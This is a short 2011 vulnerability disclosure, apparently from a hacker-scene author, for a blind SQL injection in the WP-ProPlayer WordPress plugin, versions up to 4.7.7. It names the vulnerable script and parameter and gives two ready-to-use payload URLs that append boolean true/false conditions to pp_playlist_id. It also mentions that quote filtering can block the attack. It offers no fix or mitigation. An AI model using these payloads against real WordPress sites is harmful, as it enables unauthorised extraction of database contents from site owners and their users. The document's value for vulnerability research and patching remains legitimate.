WP-ProPlayer Plugin Blind SQL Injection

22/06/2011 15:39

 <-------


   WP-ProPlayer Blind SQL Inyection

   Founder: Ca0s 

   Visit:
      st4ck-3rr0r.blogspot.com
      ka0-labs.org
   Shouts @
      evilzone.org
      elhacker.net
      diosdelared.com

------->
<-------

   Software: ProPlayer <= 4.7.7
   URL: 
      http://wordpress.org/extend/plugins/proplayer/
      http://isagoksu.com/proplayer-wordpress-plugin/
   Vuln: Blind SQL Inyection ->
      /wp-content/plugins/proplayer/playlist-controller.php?pp_playlist_id=[ID]')+and+('a'='a
      /wp-content/plugins/proplayer/playlist-controller.php?pp_playlist_id=[ID]')+and+('a'='b

   Note: some servers filter ' to %27 so wont work this way.

------->